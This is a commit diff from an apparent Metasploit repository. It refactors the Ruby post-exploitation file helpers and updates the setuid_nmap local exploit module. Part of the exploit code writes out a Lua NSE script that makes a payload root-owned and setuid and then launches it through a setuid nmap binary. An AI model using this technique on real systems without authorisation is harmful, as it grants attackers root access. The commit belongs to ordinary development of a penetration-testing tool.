adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions 9 Packages Projects Releases Wiki Activity

Land #9446, Post API fix for setuid_nmap

Browse Source
This commit is contained in:
William Vu
2018-01-25 16:00:40 -06:00
committed by Brent Cook
parent 0d98135fcb
commit a87ae41d81
2 changed files with 38 additions and 19 deletions
Download Patch File Download Diff File Expand all files Collapse all files
lib/msf/core/post/file.rb
+31 -11
View File
@@ -59,7 +59,7 @@ module Msf::Post::File
#
# @param path [String] Remote filename to check
def directory?(path)
if session.type == "meterpreter"
if session.type == 'meterpreter'
stat = session.fs.file.stat(path) rescue nil
return false unless stat
return stat.directory?
@@ -70,9 +70,9 @@ module Msf::Post::File
f = session.shell_command_token("test -d \"#{path}\" && echo true")
end
return false if f.nil? or f.empty?
return false if f.nil? || f.empty?
return false unless f =~ /true/
return true
true
end
end
@@ -93,7 +93,7 @@ module Msf::Post::File
#
# @param path [String] Remote filename to check
def file?(path)
if session.type == "meterpreter"
if session.type == 'meterpreter'
stat = session.fs.file.stat(path) rescue nil
return false unless stat
return stat.file?
@@ -107,20 +107,40 @@ module Msf::Post::File
f = session.shell_command_token("test -f \"#{path}\" && echo true")
end
return false if f.nil? or f.empty?
return false if f.nil? || f.empty?
return false unless f =~ /true/
return true
true
end
end
alias file_exist? file?
#
# See if +path+ on the remote system is a setuid file
#
# @param path [String] Remote filename to check
def setuid?(path)
if session.type == 'meterpreter'
stat = session.fs.file.stat(path) rescue nil
return false unless stat
return stat.setuid?
else
if session.platform != 'windows'
f = session.shell_command_token("test -u \"#{path}\" && echo true")
end
return false if f.nil? || f.empty?
return false unless f =~ /true/
true
end
end
#
# Check for existence of +path+ on the remote file system
#
# @param path [String] Remote filename to check
def exist?(path)
if session.type == "meterpreter"
if session.type == 'meterpreter'
stat = session.fs.file.stat(path) rescue nil
return !!(stat)
else
@@ -130,9 +150,9 @@ module Msf::Post::File
f = cmd_exec("test -e \"#{path}\" && echo true")
end
return false if f.nil? or f.empty?
return false if f.nil? || f.empty?
return false unless f =~ /true/
return true
true
end
end
@@ -290,7 +310,7 @@ module Msf::Post::File
end
end
return true
true
end
#
@@ -314,7 +334,7 @@ module Msf::Post::File
_write_file_unix_shell(file_name, data, true)
end
end
return true
true
end
#
modules/exploits/unix/local/setuid_nmap.rb
+7 -8
View File
@@ -51,12 +51,11 @@ class MetasploitModule < Msf::Exploit::Local
end
def check
stat = session.fs.file.stat(datastore["Nmap"])
if stat and stat.file? and stat.setuid?
vprint_good("#{stat.prettymode} #{datastore["Nmap"]}")
if setuid?(datastore['Nmap'])
vprint_good("#{datastore['Nmap']} is setuid")
return CheckCode::Vulnerable
end
return CheckCode::Safe
CheckCode::Safe
end
def exploit
@@ -69,16 +68,16 @@ class MetasploitModule < Msf::Exploit::Local
write_file(exe_file, generate_payload_exe)
evil_lua = %Q{
os.execute("chown root:root #{exe_file}");
os.execute("chmod 6777 #{exe_file}");
os.execute("chmod 6700 #{exe_file}");
os.execute("#{exe_file} &");
os.execute("rm #{exe_file}");
os.execute("rm -f #{exe_file}");
}
end
lua_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}.nse"
print_status("Dropping lua #{lua_file}")
write_file(lua_file, evil_lua)
print_status("running")
print_status("Running #{lua_file} with Nmap")
scriptname = lua_file
if (lua_file[0,1] == "/")
@@ -91,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Local
# Versions before 4.75 (August 2008) will not run scripts without a port scan
cmd_exec "#{datastore["Nmap"]} --script #{scriptname} -p80 localhost #{datastore["ExtraArgs"]}"
ensure
cmd_exec "rm -f #{lua_file} #{exe_file}"
rm_f(lua_file, exe_file)
end
end